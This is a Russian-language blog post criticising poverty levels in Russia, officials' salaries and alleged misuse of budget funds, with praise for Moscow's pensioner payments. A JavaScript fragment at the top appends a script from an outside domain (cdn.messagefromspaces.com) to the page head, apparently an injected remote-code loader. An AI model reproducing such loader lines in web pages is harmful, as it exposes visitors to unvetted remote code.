, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Как быть с теми, кто в зоне бедности и в зоне потребительского комфорта?

21 Ноя

Эксперты РАНХиГС провели https://www.kommersant.ru/doc/3805914    анализ социально-экономического положения и самочувствия россиян и пришли к выводу, что больше 70% из них вынуждены экономить.

В зоне бедности оказалось  22% участников опроса.  Их доходы не позволяют приобретать товары сверх минимально необходимого набора базовых продуктов питания. Они вынуждены выбирать — купить минимальный набор самых простых продуктов (например, картофель, морковь, хлеб) или купить самые дешевые, но необходимые лекарства.

Доходы, позволяющие иметь нормальное питание и покупать повседневную одежду, имеют  35,6% респондентов. Но они имеют большие сложности с приобретением предметов длительного пользования, например,  мебель, компьютер, холодильник, смартфон.

В зоне потребительского комфорта находятся только 28,3% россиян — столько респондентов сообщили, что могут позволить себе приобрести товары длительного пользования и не опасаются снижения уровня жизни в ближайшем будущем.

Анализ особенно актуален в преддверии 25-ти летия Конституции России, в которой утверждается, что Россия — социальное государство, политика которого направлена на создание условий, обеспечивающих достойную жизнь и свободное развитие человека (статья 7).

Где ещё есть страна, называющая себя «социальным государством», в которой более 20 млн. человек выбирают — купить минимальный набор самых простых продуктов (например, картофель, морковь, хлеб) или купить самые дешевые, но необходимые лекарства?

Новый бюджет страны не даёт ответа, как за три года, осуществляющие государственную власть, собираются снизить бедность. Молчит и правительство о мерах по поддержке граждан.

Спокойны только 28,3%  россиян, что оказались в зоне потребительского комфорта. Их комфорт обеспечен и бюджетом страны.

Всем депутатам и чиновникам федерального уровня, предусмотрено существенное увеличение  и без того огромных зарплат.

Этим же бюджетом предусмотрены, и возможности неправомерно обогатиться за счёт средств, что выделены на «национальные проекты».

Нет никаких преград для использования бюджетных средств, так, как их использовала https://lenta.ru/news/2018/11/07/glackih/?utm_source=yxnews&utm_medium=desktop    глава департамента молодежной политики Ольга Глацких.

В 2018 году потратили 131 миллион рублей на реализацию проектов по поддержке талантливой молодежи не  на природе, не в пионерских лагерях, а в отеле премиум-класса, где занятия вели обычные учителя, оплата труда которых не может стоить заявленных в смете сумм.

Имуществом  «сомнительного происхождения» никто не интересуется и в зоне «потребительского комфорта» оказываются успешные спортсмены. Согласно декларации, в 2017 году Глацких заработала https://ria.ru/society/20181105/1532155036.html  1,525 миллиона рублей. У чиновницы в собственности находятся два земельных участка площадью 900 и 533 квадратных метра, квартира площадью 116 «квадратов» и гараж. Кроме того, в ее пользовании находятся еще две квартиры. Из транспортных средств она задекларировала Mercedes-Benz ML 350 и Lada 212140.

При этом годом ранее, когда Глацких стала главой департамента молодежной политики Свердловской области, ее годовой доход, согласно декларации, составил 4,25 миллиона рублей.

Такие жизнью довольны, но их не более 17%.

Кто и почему непомерные  «доходы»  позволяет получать  за счёт бюджетных средств, которые и являются основной базой создания «социального государства»?

Конечно, совестливые руководители регионов, проявляют заботу о тех, кто оказался в зоне бедности. Иначе бы таковых  было гораздо больше. Только их забота о россиянах и уменьшает социальный взрыв.

Например, мэр Москвы Сергей Собянин сделал социальные доплаты для пенсионеров, которых нигде больше в России нет.

Им, и его командой создаются условия для комфортной жизни пенсионеров.

Например, территориальные центры социального обслуживания.

 

Недавно в своём  твиттере Сергей Собянин рассказал о том, что врачи предложили провести эксперимент: дать пациентам возможность самим покупать нужные препараты в аптеках за бюджетные средства.

Мне, как пенсионеру, станет  дешевле доплачивать за нужные мне лекарства, если я буду получать, выделенные бюджетные средства, вместо тех лекарств, что мне  выписывает врач в поликлинике, а я их не беру, покупая то, что мне выписал врач в больнице.

Социально-экономическое положение страны требует от гаранта Конституции Владимира Путина, особого внимания к тем, кто оказался в зоне бедности, но сегодня требуется ещё большее внимание к тем, кто говорит россиянам: «Денег нет, но вы терпите», а сам не стесняется получать зарплату, превышающую в 20 раз среднюю зарплату по стране и в 30 раз пенсии, что получают миллионы россиян.

Осуществляющие государственную власть сами никогда не осознают, что непорядочно жить в зоне комфорта, используя для этого общенародное достояние — бюджет страны. Миллионам россиян, что в зоне бедности должны хотя бы говорить им об этом. Сами чиновники, вероятно, не догадываются, как живут те, что наделили их полномочиями осуществлять государственную власть.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.